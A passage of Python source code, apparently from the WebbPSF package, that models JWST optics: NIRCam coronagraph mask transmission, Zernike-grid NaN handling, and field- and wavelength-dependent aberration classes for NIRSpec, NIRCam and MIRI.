""" import scipy.special if not isinstance(wave, poppy.Wavefront): # pragma: no cover raise ValueError("BLC getPhasor must be called with a Wavefront to define the spacing") assert (wave.planetype == poppy.poppy_core._IMAGE) y, x = self.get_coordinates(wave) if self.bar_offset is not None: x += float(self.bar_offset) if self.kind == 'nircamcircular': r = poppy.accel_math._r(x, y) sigmar = self.sigma * r # clip sigma: The minimum is to avoid divide by zero # the maximum truncates after the first sidelobe to match the hardware bessel_j1_zero2 = scipy.special.jn_zeros(1, 2)[1] sigmar.clip(np.finfo(sigmar.dtype).tiny, bessel_j1_zero2, out=sigmar) # avoid divide by zero -> NaNs if poppy.accel_math._USE_NUMEXPR: import numexpr as ne jn1 = scipy.special.j1(sigmar) self.transmission = ne.evaluate("(1 - (2 * jn1 / sigmar) ** 2)") else: self.transmission = (1 - (2 * scipy.special.j1(sigmar) / sigmar) ** 2) self.transmission[r == 0] = 0 # special case center point (value based on L'Hopital's rule) elif self.kind == 'nircamwedge': # This is hard-coded to the wedge-plus-flat-regions shape for NIRCAM # the scale fact should depend on X coord in arcsec, scaling across a 20 arcsec FOV. # map flat regions to 2.5 arcsec each # map -7.5 to 2, +7.5 to 6. slope is 4/15, offset is +9.5 wedgesign = 1 if self.name == 'MASKSWB' else -1 # wide ends opposite for SW and LW scalefact = (2 + (x * wedgesign + 7.5) * 4 / 15).clip(2, 6) # Working out the sigma parameter vs. wavelength to get that wedge pattern is non trivial # This is NOT a linear relationship. See calc_blc_wedge helper fn below. if self.name == 'MASKSWB': # np.abs(self.wavelength - 2.1e-6) < 0.1e-6: polyfitcoeffs = np.array([2.01210737e-04, -7.18758337e-03, 1.12381516e-01, -1.00877701e+00, 5.72538509e+00, -2.12943497e+01, 5.18745152e+01, -7.97815606e+01, 7.02728734e+01]) elif self.name == 'MASKLWB': # elif np.abs(self.wavelength - 4.6e-6) < 0.1e-6: polyfitcoeffs = np.array([9.16195583e-05, -3.27354831e-03, 5.11960734e-02, -4.59674047e-01, 2.60963397e+00, -9.70881273e+00, 2.36585911e+01, -3.63978587e+01, 3.20703511e+01]) else: raise NotImplementedError("invalid name for NIRCam wedge occulter") sigmas = scipy.poly1d(polyfitcoeffs)(scalefact) sigmar = sigmas * np.abs(y) # clip sigma: The minimum is to avoid divide by zero # the maximum truncates after the first sidelobe to match the hardware sigmar.clip(min=np.finfo(sigmar.dtype).tiny, max=2 * np.pi, out=sigmar) self.transmission = (1 - (np.sin(sigmar) / sigmar) ** 2) self.transmission[y == 0] = 0 # special case center point (value based on L'Hopital's rule) # the bar should truncate at +- 10 arcsec: woutside = np.where(np.abs(x) > 10) self.transmission[woutside] = 1.0 if self.nd_squares: # add in the ND squares. Note the positions are not exactly the same in the two wedges. # See the figures in Krist et al. 
            # Note: 180 deg rotation needed relative to Krist's figures for the flight SCI orientation:
            if ((self.module == 'A' and self.name == 'MASKLWB') or
                    (self.module == 'B' and self.name == 'MASK210R')):
                # left edge:
                # has one fully in the corner and one half in the other corner, half outside the 10x10 box
                wnd_5 = np.where(
                    ((y < -5) & (y > -10)) &
                    (
                            ((x > 5) & (x < 10)) |
                            ((x < -7.5) & (x > -12.5))
                    )
                )
                wnd_2 = np.where(
                    ((y < 10) & (y > 8)) &
                    (
                            ((x > 8) & (x < 10)) |
                            ((x < -9) & (x > -11))
                    )
                )
            elif ((self.module == 'A' and self.name == 'MASK210R') or
                  (self.module == 'B' and self.name == 'MASKSWB')):
                # right edge
                wnd_5 = np.where(
                    ((y < -5) & (y > -10)) &
                    (
                            ((x < 12.5) & (x > 7.5)) |
                            ((x < -5) & (x > -10))
                    )
                )
                wnd_2 = np.where(
                    ((y < 10) & (y > 8)) &
                    (
                            ((x < 11) & (x > 9)) |
                            ((x < -8) & (x > -10))
                    )
                )
            else:
                # the others have two, one in each corner, both halfway out of the 10x10 box.
                wnd_5 = np.where(
                    ((y < -5) & (y > -10)) &
                    (np.abs(x) > 7.5) &
                    (np.abs(x) < 12.5)
                )
                wnd_2 = np.where(
                    ((y < 10) & (y > 8)) &
                    (np.abs(x) > 9) &
                    (np.abs(x) < 11)
                )

            self.transmission[wnd_5] = np.sqrt(1e-3)
            self.transmission[wnd_2] = np.sqrt(1e-3)

            # Add in the opaque border of the coronagraph mask holder.
            if ((self.module == 'A' and self.name == 'MASKLWB') or
                    (self.module == 'B' and self.name == 'MASK210R')):
                # left edge
                woutside = np.where((x > 10) & (y > -11.5))
                self.transmission[woutside] = 0.0
            elif ((self.module == 'A' and self.name == 'MASK210R') or
                  (self.module == 'B' and self.name == 'MASKSWB')):
                # right edge
                woutside = np.where((x < -10) & (y > -11.5))
                self.transmission[woutside] = 0.0
            # mask holder edge
            woutside = np.where(y > 10)
            self.transmission[woutside] = 0.0

            # edge of mask itself
            # TODO the mask edge is complex and partially opaque based on CV3 images?
            # edge of glass plate rather than opaque mask I believe. To do later.
            # The following is just a temporary placeholder with no quantitative accuracy,
            # but this is outside the coronagraph FOV so that's fine - this only would matter in
            # modeling atypical/nonstandard calibration exposures.
            wedge = np.where((y < -11.5) & (y > -13))
            self.transmission[wedge] = 0.7

        if not np.isfinite(self.transmission.sum()):
            _log.warning("There are NaNs in the BLC mask - correcting to zero. (DEBUG LATER?)")
(DEBUG LATER?)") self.transmission[np.where(np.isfinite(self.transmission) == False)] = 0 return self.transmission def display(self, annotate=False, annotate_color='cyan', annotate_text_color=None, grid_size=20, *args, **kwargs): """Same as regular display for any other optical element, except adds annotate option for the LWB offsets """ poppy.AnalyticOpticalElement.display(self, grid_size=grid_size, *args, **kwargs) if annotate: shift_dx = getattr(self, 'shift_x', 0) - getattr(self, 'bar_offset', 0) shift_dy = getattr(self, 'shift_y', 0) if annotate_text_color is None: annotate_text_color = annotate_color if self.name.lower() == 'maskswb' or self.name.lower() == 'masklwb': offset = self.offset_swb if self.name.lower() == 'maskswb' else self.offset_lwb for filt, offset in offset.items(): if 'W' in filt: horiz, vert, voffset = 'right', 'top', -0.5 else: horiz, vert, voffset = 'left', 'bottom', +0.5 matplotlib.pyplot.plot(offset + shift_dx, shift_dy, marker='+', color=annotate_color, clip_on=True) matplotlib.pyplot.text(offset + shift_dx, voffset + shift_dy, filt, color=annotate_text_color, rotation=75, horizontalalignment=horiz, verticalalignment=vert, clip_on=True) ax = matplotlib.pyplot.gca() # Fix the axis scaling if any of the overplots exceeded it ax.set_xlim(-grid_size / 2, grid_size / 2) ax.set_ylim(-grid_size / 2, grid_size / 2) # Helper functions for NIRcam occulters. # The following are no longer used in practice, but were used to derive the # table of polynomial coefficients that is now hard-coded inside # the NIRCam_BandLimitedCoron case for the nircam wedge occulters. def _width_blc(desired_width, approx=None, plot=False): """ The calculation of sigma parameters for the wedge BLC function is not straightforward. This function numerically solves the relevant equation to determine the sigma required to acheive a given HWHM. It uses recursion to iterate to a higher precision level. """ loc = desired_width if approx is None: sigma = np.linspace(0, 20, 5000) else: sigma = np.linspace(approx * 0.9, approx * 1.1, 100000.) lhs = loc * np.sqrt(1 - np.sqrt(0.5)) rhs = np.sin(sigma * loc) / sigma diff = np.abs(lhs - rhs) wmin = np.where(diff == np.nanmin(diff)) sig_ans = sigma[wmin][0] if approx: return sig_ans else: # use recursion sig_ans = _width_blc(loc, sig_ans) if plot: check = (1 - (np.sin(sig_ans * loc) / sig_ans / loc) ** 2) ** 2 # plt.plot(sigma, lhs) plt.clf() plt.plot(sigma, rhs) plt.axhline(lhs) print("sigma = %f implies HWHM = %f" % (sig_ans, loc)) print(" check: 0.5 == %f" % (check)) return sig_ans def _calc_blc_wedge(deg=4, wavelength=2.1e-6): """ This function determines the desired sigma coefficients required to achieve a wedge from 2 to 6 lam/D. It returns the coefficients of a polynomial fit that maps from nlambda/D to sigma. """ import scipy r = np.linspace(2, 6, 161) difflim = wavelength / 6.5 * 180. * 60 * 60 / np.pi sigs = [_width_blc(difflim * ri) for ri in r] pcs = scipy.polyfit(r, sigs, deg) p = scipy.poly1d(pcs) plt.plot(r, sigs, 'b') plt.plot(r, p(r), "r--") diffs = (sigs - p(r)) print("Poly fit:" + repr(pcs)) print(" fit rms: " + str(diffs.std())) def _trim_nan_image(xgrid, ygrid, zgrid): """NaN Trimming of Image Remove rows/cols with NaN's while trying to preserve the maximum footprint of real data. 
""" xgrid2, ygrid2, zgrid2 = xgrid, ygrid, zgrid # Create a mask of NaN'ed values nan_mask = np.isnan(zgrid2) nrows, ncols = nan_mask.shape # Determine number of NaN's along each row and col num_nans_cols = nan_mask.sum(axis=0) num_nans_rows = nan_mask.sum(axis=1) # First, crop all rows/cols that are only NaN's xind_good = np.where(num_nans_cols < nrows)[0] yind_good = np.where(num_nans_rows < ncols)[0] # get border limits x1, x2 = (xind_good.min(), xind_good.max()+1) y1, y2 = (yind_good.min(), yind_good.max()+1) # Trim of NaN borders xgrid2 = xgrid2[x1:x2] ygrid2 = ygrid2[y1:y2] zgrid2 = zgrid2[y1:y2,x1:x2] # Find a optimal rectangule subsection free of NaN's # Iterative cropping ndiff = 5 while np.isnan(zgrid2.sum()): # Make sure ndiff is not negative if ndiff<0: break npix = zgrid2.size # Create a mask of NaN'ed values nan_mask = np.isnan(zgrid2) nrows, ncols = nan_mask.shape # Determine number of NaN's along each row and col num_nans_cols = nan_mask.sum(axis=0) num_nans_rows = nan_mask.sum(axis=1) # Look for any appreciable diff row-to-row/col-to-col col_diff = num_nans_cols - np.roll(num_nans_cols,-1) row_diff = num_nans_rows - np.roll(num_nans_rows,-1) # For edge wrapping, just use last minus previous col_diff[-1] = col_diff[-2] row_diff[-1] = row_diff[-2] # Keep rows/cols composed mostly of real data # and where number of NaN's don't change dramatically xind_good = np.where( ( np.abs(col_diff) <= ndiff ) & ( num_nans_cols < 0.5*nrows ) )[0] yind_good = np.where( ( np.abs(row_diff) <= ndiff ) & ( num_nans_rows < 0.5*ncols ) )[0] # get border limits x1, x2 = (xind_good.min(), xind_good.max()+1) y1, y2 = (yind_good.min(), yind_good.max()+1) # Trim of NaN borders xgrid2 = xgrid2[x1:x2] ygrid2 = ygrid2[y1:y2] zgrid2 = zgrid2[y1:y2,x1:x2] # Check for convergence # If we've converged, reduce if npix==zgrid2.size: ndiff -= 1 # Last ditch effort in case there are still NaNs # If so, remove rows/cols 1 by 1 until no NaNs while np.isnan(zgrid2.sum()): xgrid2 = xgrid2[1:-1] ygrid2 = ygrid2[1:-1] zgrid2 = zgrid2[1:-1,1:-1] return xgrid2, ygrid2, zgrid2 def _fix_zgrid_NaNs(xgrid, ygrid, zgrid, rot_ang=0): """Fix NaN's in Zernike Grid We trim NaN's within `zgrid`, then generate an extrapolation function using `RegularGridInterpolator`. A rotation angle can also be specified to maximize the number of remaining data points due to irregular polygons of the real `zgrid` data. Returns `zgrid` with the NaN's fixed using the extrapolation function. Parameter ========= xgrid : ndarray 1D V2 regular grid information ygrid : ndarray 1D V3 regular grid information zgrid : ndarray 2D Zernike grid rot_ang : float Option to rotate grid data for more optimal trimming of NaN's. 
""" # Rotate zgrid if rot_ang != 0: zgrid = rotate(zgrid, rot_ang, reshape=False, order=1, cval=np.nan) # There will be some NaN's along the border that need to be replaced ind_nan = np.isnan(zgrid) # Remove rows/cols with NaN's xgrid2, ygrid2, zgrid2 = _trim_nan_image(xgrid, ygrid, zgrid) # Create regular grid interpolator function for extrapolation of NaN's func = RegularGridInterpolator((ygrid2,xgrid2), zgrid2, method='linear', bounds_error=False, fill_value=None) # Replace NaNs X, Y = np.meshgrid(xgrid,ygrid) pts = np.array([Y[ind_nan], X[ind_nan]]).transpose() zgrid[ind_nan] = func(pts) # De-rotate clipped zgrid image and redo RegularGridInterpolator if rot_ang != 0: # De-rotate zgrid = rotate(zgrid, -rot_ang, reshape=False, order=1, cval=np.nan) # There will be some NaNs along the border that need to be replaced ind_nan = np.isnan(zgrid) # Remove rows/cols 1 by 1 until no NaNs xgrid2, ygrid2, zgrid2 = _trim_nan_image(xgrid, ygrid, zgrid) # Create regular grid interpolator function for extrapolation of NaN's func = RegularGridInterpolator((ygrid2,xgrid2), zgrid2, method='linear', bounds_error=False, fill_value=None) # Replace NaNs pts = np.array([Y[ind_nan], X[ind_nan]]).transpose() zgrid[ind_nan] = func(pts) return zgrid def _get_initial_pupil_sampling(instrument): """Utility function to retrieve the sampling of the first plane in some optical system. Returns: npix, pixelscale """ # Determine the pupil sampling of the first aperture in the # instrument's optical system if isinstance(instrument.pupil, poppy.OpticalElement): # This branch needed to handle the OTE Linear Model case npix = instrument.pupil.shape[0] pixelscale = instrument.pupil.pixelscale else: # these branches to handle FITS files, by name or as an object if isinstance(instrument.pupil, fits.HDUList): pupilheader = instrument.pupil[0].header else: pupilfile = os.path.join(instrument._datapath, "OPD", instrument.pupil) pupilheader = fits.getheader(pupilfile) npix = pupilheader['NAXIS1'] pixelscale = pupilheader['PUPLSCAL'] * units.meter / units.pixel return npix, pixelscale # Field dependent aberration class for JWST instruments class WebbFieldDependentAberration(poppy.OpticalElement): """ Field dependent aberration generated from Zernikes measured in ISIM CV testing Parameters ----------- include_oversize : bool Explicitly model the 4% oversize for pupil tolerance """ def __init__(self, instrument, include_oversize=False, **kwargs): super(WebbFieldDependentAberration, self).__init__( name="Aberrations", **kwargs ) self.instrument = instrument self.instr_name = instrument.name # work out which name to index into the CV results with, if for NIRCam is_nrc_coron = False # Define NRC coronagraph variable for conciseness if instrument.name == 'NIRCam': channel = instrument.channel[0].upper() lookup_name = "NIRCam{channel}W{module}".format( channel=channel, module=instrument.module ) # Check for coronagraphy; Set is_ncr_coron to True for Lyot pupil mask pupil_mask = self.instrument._pupil_mask is_nrc_coron = (pupil_mask is not None) and ( ('LYOT' in pupil_mask.upper()) or ('MASK' in pupil_mask.upper()) ) elif instrument.name == 'FGS': # 'GUIDER1' or 'GUIDER2' assert instrument.detector in ('FGS1', 'FGS2') lookup_name = 'Guider' + instrument.detector[3] else: lookup_name = instrument.name _log.debug("Retrieving Zernike coefficients for " + lookup_name) self.tel_coords = instrument._tel_coords() # load the Zernikes table here zfile = "si_zernikes_isim_cv3.fits" # Check special case NIRCam coronagraphy if is_nrc_coron: zfile = 
"si_zernikes_coron_wfe.fits" zernike_file = os.path.join(utils.get_webbpsf_data_path(), zfile) if not os.path.exists(zernike_file): raise RuntimeError("Could not find Zernike coefficients file {} \ in WebbPSF data directory".format(zfile)) else: self.ztable_full = Table.read(zernike_file) npix, self.pixelscale = _get_initial_pupil_sampling(self.instrument) self.ztable = self.ztable_full[self.ztable_full['instrument'] == lookup_name] # Figure out the closest field point telcoords_am = self.tel_coords.to(units.arcmin).value v2 = self.ztable['V2'] v3 = self.ztable['V3'] r = np.sqrt((telcoords_am[0] - v2) ** 2 + (telcoords_am[1] - v3) ** 2) closest = np.argmin(r) # Save closest ISIM CV3 WFE measured field point for reference self.row = self.ztable[closest] self.name = "{instrument} internal WFE at V2V3=({v2:.2f},{v3:.2f})', near {field_point}".format( instrument=lookup_name, field_point=self.row['field_point_name'], v2=telcoords_am[0], v3=telcoords_am[1] ) self.si_wfe_type = ("Interpolated", "SI WFE was interpolated between available meas.") # Retrieve those Zernike coeffs # Field point interpolation v2_tel, v3_tel = telcoords_am coeffs = [] for i in range(1, 37): zkey = 'Zernike_{}'.format(i) zvals = self.ztable[zkey] # Cubic interpolation of of non-uniform 2D grid cf = griddata((v2, v3), zvals, (v2_tel, v3_tel), method='cubic').tolist() # Want to perform extrapolation if field point outside of bounds if np.isnan(cf): if i==1: self.si_wfe_type = ("Extrapolated", "SI WFE was extrapolated outside available meas.") # To extrapolate outside the measured field points, we proceed # in two steps. This first creates a fine-meshed cubic fit # over the known field points, fixes any NaN's using # RegularGridInterpolator, then again uses RegularGridInterpolator # on the fixed data to extrapolate the requested field point. # In principle, the first call of RegularGridInterpolator can be # used to extrapolate the requested field point to eliminate # the intermediate step, but this method enables use of all the # real data rather than the trimmed data set. RGI is a rather # quick process, so added overheads should be negligible. # Full field V2/V3 limits for each instrument. # Produces better initial extrapolation with fewer # interpolation artifacts in RGI. if lookup_name == 'Guider1': v2_min, v2_max, v3_min, v3_max = (2.2, 4.7, -12.9, -10.4) elif lookup_name == 'Guider2': v2_min, v2_max, v3_min, v3_max = (-0.8, 1.6, -12.9, -10.4) elif lookup_name == 'NIRISS': v2_min, v2_max, v3_min, v3_max = (-6.0, -3.6, -12.9, -10.4) elif lookup_name == 'MIRI': v2_min, v2_max, v3_min, v3_max = (-8.3, -6.1, -7.3, -5.2) elif lookup_name == 'NIRSpec': v2_min, v2_max, v3_min, v3_max = (3.7, 9.0, -9.8, -4.5) elif (lookup_name == 'NIRCamLWA') or (lookup_name == 'NIRCamSWA'): v2_min, v2_max, v3_min, v3_max = (0.2, 2.7, -9.5, -7.0) elif (lookup_name == 'NIRCamLWB') or (lookup_name == 'NIRCamSWB'): v2_min, v2_max, v3_min, v3_max = (-2.7, -0.2, -9.5, -7.0) else: v2_min, v2_max, v3_min, v3_max = (v2.min(), v2.max(), v3.min(), v3.max()) # For NIRCam coronagraphy, add 50" to V3 limits if is_nrc_coron: v3_min += 50. / 60. v3_max += 50. / 60. # Create fine mesh grid dstep = 1. / 60. 
# 1" steps xgrid = np.arange(v2_min, v2_max+dstep, dstep) ygrid = np.arange(v3_min, v3_max+dstep, dstep) X, Y = np.meshgrid(xgrid,ygrid) # Cubic interpolation of all points # Will produce a number of NaN's that need to be extrapolated over zgrid = griddata((v2, v3), zvals, (X, Y), method='cubic') # Want to rotate zgrid image of some SIs to minimize NaN clipping if 'NIRSpec' in lookup_name: rot_ang = 43 elif 'MIRI' in lookup_name: rot_ang = -5 elif 'NIRISS' in lookup_name: rot_ang = 2 else: rot_ang = 0 # Fix the NaN's within zgrid array # Perform specified rotation for certain SIs # Trim rows/cols zgrid = _fix_zgrid_NaNs(xgrid, ygrid, zgrid, rot_ang=rot_ang) # Create final function for extrapolation func = RegularGridInterpolator((ygrid,xgrid), zgrid, method='linear', bounds_error=False, fill_value=None) # Extrapolate at requested (V2,V3) coordinates cf = func( (v3_tel, v2_tel) ).tolist() coeffs.append(cf) self.zernike_coeffs = coeffs # Generate an OPD on the same sampling as the input wavefront - # but implicitly inverted in coordinate system # to match the OTE exit pupil orientation if include_oversize: # Try to model the oversized gaps around the internal pupils. # This is only relevant if you are trying to model pupil shear or rotations, # and in general we don't have good WFE data outside the nominal pupil anyway # so let's leave this detail off by default. # internal pupils for NIRISS and MIRI instruments are 4 percent # oversized tricontagons if self.instrument.name == "NIRISS": self.amplitude = fits.getdata(os.path.join( utils.get_webbpsf_data_path(), 'tricontagon_oversized_4pct.fits.gz') ) # cut out central region to match the OPD, which is hard coded # to 1024 self.amplitude = self.amplitude[256:256 + 1024, 256:256 + 1024] elif self.instrument.name == "MIRI": self.amplitude = fits.getdata(os.path.join( utils.get_webbpsf_data_path(), 'MIRI', 'optics', 'MIRI_tricontagon_oversized_rotated.fits.gz') ) else: # internal pupil is a 4 percent oversized circumscribing circle? # For NIRCam: # John stansberry 2016-09-07 reports "It is definitely oversized, but isn't really # circular... Kinda vaguely 6-sided I guess. [...] I can dig up # a drawing and/or some images that show the pupil stop." y, x = np.indices((npix, npix), dtype=float) y -= (npix - 1) / 2.0 x -= (npix - 1) / 2.0 r = np.sqrt(y ** 2 + x ** 2) self.amplitude = (r < (npix - 1) / 2.0 * 1.04).astype(int) self.opd = poppy.zernike.opd_from_zernikes( coeffs, npix=npix, aperture=self.amplitude, outside=0 ) else: self.opd = poppy.zernike.opd_from_zernikes( coeffs, npix=npix, outside=0 ) self.amplitude = (self.opd != 0).astype(int) def header_keywords(self): """ Return info we would like to save in FITS header of output PSFs """ from collections import OrderedDict keywords = OrderedDict() keywords['SIWFETYP'] = self.si_wfe_type keywords['SIWFEFPT'] = (self.row['field_point_name'], "Closest ISIM CV3 WFE meas. field point") for i in range(1, 36): keywords['SIZERN{}'.format(i)] = (self.zernike_coeffs[i - 1], "[m] SI WFE coeff for Zernike term {}".format(i)) return keywords # wrapper just to change default vmax def display(self, *args, **kwargs): if 'opd_vmax' not in kwargs: kwargs.update({'opd_vmax': 2.5e-7}) return super(WebbFieldDependentAberration, self).display(*args, **kwargs) class NIRSpecFieldDependentAberration(WebbFieldDependentAberration): """ Subclass that adds to the above the division into fore-optics and spectrograph optics for NIRSpec. 
    The available end-to-end optical test data for NIRSpec from ISIM CV3
    do not allow distinguishing which optical planes have which amounts of
    aberration. However, the NIRSpec team performed extensive metrology
    during the assembly of NIRSpec FM2, both of individual components and
    of the assembled system, using a Shack-Hartmann WFS temporarily placed
    within the optical system. [should add document number here to the
    report with those data!]

    Based on those data, Maurice Te Plate recommended to Marshall Perrin
    that the CV3 WFE should be apportioned 1/3 to the fore-optics and 2/3
    to the spectrograph optics (collimator & camera). Given the
    uncertainties and available data, that seems sufficiently precise for
    current purposes.
    """

    def __init__(self, instrument, where='fore', **kwargs):
        super(NIRSpecFieldDependentAberration, self).__init__(instrument, **kwargs)

        if where == 'fore':
            self.name = 'NIRSpec fore-optics WFE, near {}'.format(self.row['field_point_name'])
            self.scalefactor = 1. / 3
        else:
            self.name = 'NIRSpec spectrograph WFE, near {}'.format(self.row['field_point_name'])
            self.scalefactor = 2. / 3

        # apply scale factor to split up the OPD, and that's all we need to do.
        self.opd *= self.scalefactor


class NIRCamFieldAndWavelengthDependentAberration(WebbFieldDependentAberration):
    """ Subclass that adds to the above the wavelength dependent variation
    in defocus for NIRCam.

    The model for this is based on NIRCam models and ISIM CV2 test data, as
    provided by Randal Telfer to Marshall Perrin. It uses a combination of
    model design predictions continuously at all wavelengths based on the
    properties of the glasses in the refractive optical design, plus some
    small tweaks to achieve better agreement with the CV test measurements
    of defocus at a small subset of wavelengths.
    """

    def __init__(self, instrument, **kwargs):
        super(NIRCamFieldAndWavelengthDependentAberration, self).__init__(
            instrument, **kwargs)

        # Polynomial equations fit to defocus model. Wavelength-dependent focus
        # results should correspond to Zernike coefficients in meters.
        # Fits were performed to the SW and LW optical design focus model
        # as provided by Randal Telfer.
        # See plot at https://github.com/spacetelescope/webbpsf/issues/179
        # The relative wavelength dependence of these focus models is very
        # similar for coronagraphic mode in the Zemax optical prescription,
        # so we opt to use the same focus model in both imaging and coronagraphy.
        defocus_to_rmswfe = -1.09746e7  # convert from mm defocus to meters (WFE)
        sw_focus_cf = np.array([-5.169185169, 50.62919436, -201.5444129,
                                415.9031962, -465.9818413, 265.843112,
                                -59.64330811]) / defocus_to_rmswfe
        lw_focus_cf = np.array([0.175718713, -1.100964635, 0.986462016,
                                1.641692934]) / defocus_to_rmswfe
        self.fm_short = np.poly1d(sw_focus_cf)
        self.fm_long = np.poly1d(lw_focus_cf)

        # Coronagraphic tilt (`ctilt`) offset model
        # Primarily affects the LW channel (approximately a 0.031mm diff from 3.5um to 5.0um).
        # SW module is small compared to LW, but we include it for completeness.
        # Values have been determined using the Zernike offsets as reported in the
        # NIRCam Zemax models. The center reference positions will correspond to the
        # NIRCam target acquisition filters (3.35um for LW and 2.1um for SW)
        sw_ctilt_cf = np.array([125.849834, -289.018704]) / 1e9
        lw_ctilt_cf = np.array([146.827501, -2000.965222,
                                8385.546158, -11101.658322]) / 1e9
        self.ctilt_short = np.poly1d(sw_ctilt_cf)
        self.ctilt_long = np.poly1d(lw_ctilt_cf)

        # Get the representation of focus in the same Zernike basis as used for
        # making the OPD. While it looks like this does more work here than needed
        # by making a whole basis set, in fact because of caching behind the scenes
        # this is actually quick
        basis = poppy.zernike.zernike_basis_faster(
            nterms=len(self.zernike_coeffs),
            npix=self.opd.shape[0],
            outside=0
        )
        self.defocus_zern = basis[3]
        self.tilt_zern = basis[2]

    def get_opd(self, wave):
        """
        Parameters
        ----------
        wave : float or obj
            either a scalar wavelength (meters) or a Wavefront object
        """
        if isinstance(wave, poppy.Wavefront):
            wavelength = wave.wavelength
        else:
            wave = poppy.Wavefront(wavelength=float(wave))
            wavelength = wave.wavelength

        # Check for coronagraphy
        pupil_mask = self.instrument._pupil_mask
        is_nrc_coron = (pupil_mask is not None) and (
            ('LYOT' in pupil_mask.upper()) or ('MASK' in pupil_mask.upper())
        )

        # Which wavelength was used to generate the OPD map we have already
        # created from zernikes?
        if self.instrument.channel.upper() == 'SHORT':
            focusmodel = self.fm_short
            opd_ref_wave = 2.12
            opd_ref_focus = focusmodel(opd_ref_wave)
        else:
            focusmodel = self.fm_long
            opd_ref_wave = 3.23
            # All LW WFE measurements were made using F323N,
            # which has its own focus that deviates from focusmodel().
            # But only do this for direct imaging SI WFE values,
            # because coronagraph WFE was measured in Zemax (no additional focus power).
            if is_nrc_coron:
                opd_ref_focus = focusmodel(opd_ref_wave)
            else:
                opd_ref_focus = 1.206e-7  # Not coronagraphy (e.g., imaging)

        # If F323N or F212N, then no focus offset necessary
        wave_um = wavelength.to(units.micron).value
        if ('F323N' in self.instrument.filter) or ('F212N' in self.instrument.filter):
            deltafocus = 0
        else:
            deltafocus = focusmodel(wave_um) - opd_ref_focus

        _log.info(" Applying OPD focus adjustment based on NIRCam focus vs wavelength model")
        _log.info(" Modified focus from {} to {} um: {:.3f} nm wfe".format(
            opd_ref_wave, wave_um, -deltafocus * 1e9)
        )

        # Apply defocus
        mod_opd = self.opd - deltafocus * self.defocus_zern

        # Apply wavelength-dependent tilt offset for coronagraphy
        # We want the reference wavelength to be that of the target acq filter
        # Final offset will position TA ref wave at the OPD ref wave location
        # (wave_um - opd_ref_wave) - (ta_ref_wave - opd_ref_wave) = wave_um - ta_ref_wave
        if is_nrc_coron:
            if self.instrument.channel.upper() == 'SHORT':
                ctilt_model = self.ctilt_short
                ta_ref_wave = 2.10
            else:
                ctilt_model = self.ctilt_long
                ta_ref_wave = 3.35

            tilt_offset = ctilt_model(wave_um) - ctilt_model(ta_ref_wave)
            _log.info(" Applying OPD tilt adjustment based on NIRCam tilt vs wavelength model")
            _log.info(" Modified tilt from {} to {} um: {:.3f} nm wfe".format(
                ta_ref_wave, wave_um, tilt_offset * 1e9)
            )
            # Apply tilt offset
            mod_opd = mod_opd + tilt_offset * self.tilt_zern

        rms = np.sqrt((mod_opd[mod_opd != 0] ** 2).mean())
        _log.info(" Resulting OPD has {:.3f} nm rms".format(rms * 1e9))

        return mod_opd


class MIRIFieldDependentAberrationAndObscuration(WebbFieldDependentAberration):
    """ Subclass that adds to the above the field dependent obscuration from
    the MIRI internal calibration source pickoff mirror.
The model for this was derived by Randal Telfer based on the optical model file OTE_MIRI_20150223.seq, provided by Scott Rohrbach. In this case we do turn on by default the tricontagon outline since we have to worry about pupil shape anyway. """ def __init__(self, instrument, include_oversize=True, **kwargs): super(MIRIFieldDependentAberrationAndObscuration, self).__init__( instrument, include_oversize=include_oversize, **kwargs ) # figure out the XAN, YAN coordinates in degrees, # since that is what Randal's linear model expects xanyan = instrument._xan_yan_coords().to(units.degree) xan = xanyan[0].value yan = xanyan[1].value # Telfer: # Here is the matrix that reproduces the projection of the # obscuration on the primary mirror, V2-V3 coordinates and # radius in mm, as a function of XAN,YAN in degrees. # So, V2 is: # # V2 = -20882.636 * XAN -680.661 * YAN - 1451.682. # # XAN YAN Const # V2 -20882.636 -680.661 -1451.682 # V3 815.955 26395.552 -2414.406 # Rad 176.864 -392.545 626.920 # we implement the above here, and convert the outputs to meters: self.obsc_v2 = (-20882.636 * xan - 680.661 * yan - 1451.682) * 0.001 self.obsc_v3 = (815.955 * xan + 26395.552 * yan - 2414.406) * 0.001 self.obsc_r = (176.864 * xan - 392.545 * yan + 626.920) * 0.001 # generate coordinates. N.B. this assumed hard-coded pixel scale and # array size. pixel_scale = constants.JWST_CIRCUMSCRIBED_DIAMETER / 1024 y, x = poppy.Wavefront.pupil_coordinates((1024, 1024), pixel_scale) # Now, the v2 and v3 coordinates calculated above are as projected back to # the OTE entrance pupil # But the OTE exit pupil as seen at the MIRI internal pupil is rotated by # 5 degrees with respect to that, and flipped in handedness as well # (but only in V3, given webbpsf axes conventions relative to the definition of the V frame) # Therefore we must transform the v2 and v3 to match the wavefront coords at the # intermediate plane. angle = np.deg2rad(instrument._rotation) proj_v2 = np.cos(angle) * self.obsc_v2 - np.sin(angle) * self.obsc_v3 proj_v3 = -np.sin(angle) * self.obsc_v2 + np.cos(angle) * self.obsc_v3 # handle V3 flip from OTE entrance to exit pupils # no flip needed for V2 since that's already implicitly done between # the V frame looking "in" to the OTE vs WebbPSF simulations looking # "out" from the detector toward the sky. proj_v3 *= -1 mask = np.sqrt((y - proj_v3) ** 2 + (x - proj_v2) ** 2) < self.obsc_r self.amplitude[mask] = 0 # No need to subclass any of the methods; it's sufficient to set the custom # amplitude mask attribute value. # Alternative implementation that just reads OPDs from some file class LookupTableFieldDependentAberration(poppy.OpticalElement): """ Retrieve OPDs from a lookup table over many field points. This is pretty much a hack, hard-coded for a specific data delivery from Ball! Intended for OTE team WFR4 and MIMF KDP Practice data prep, not generalized beyond that. Parameters ----------- add_niriss_defocus: bool add 0.8 microns PTV defocus to NIRISS only (for WFR4 test) rm_ptt: bool Remove piston, tip, tilt rm_center_ptt : bool If rm_ptt, use the center value for each detector rather than per field point nwaves: float Number of waves to defocus SM, if add_sm_defocus_pos or add_sm_defocus_neg is True. add_sm_defocus: bool If True, add "nwaves" of SM defocus, measured at a reference wavelength of 2.0 microns. 
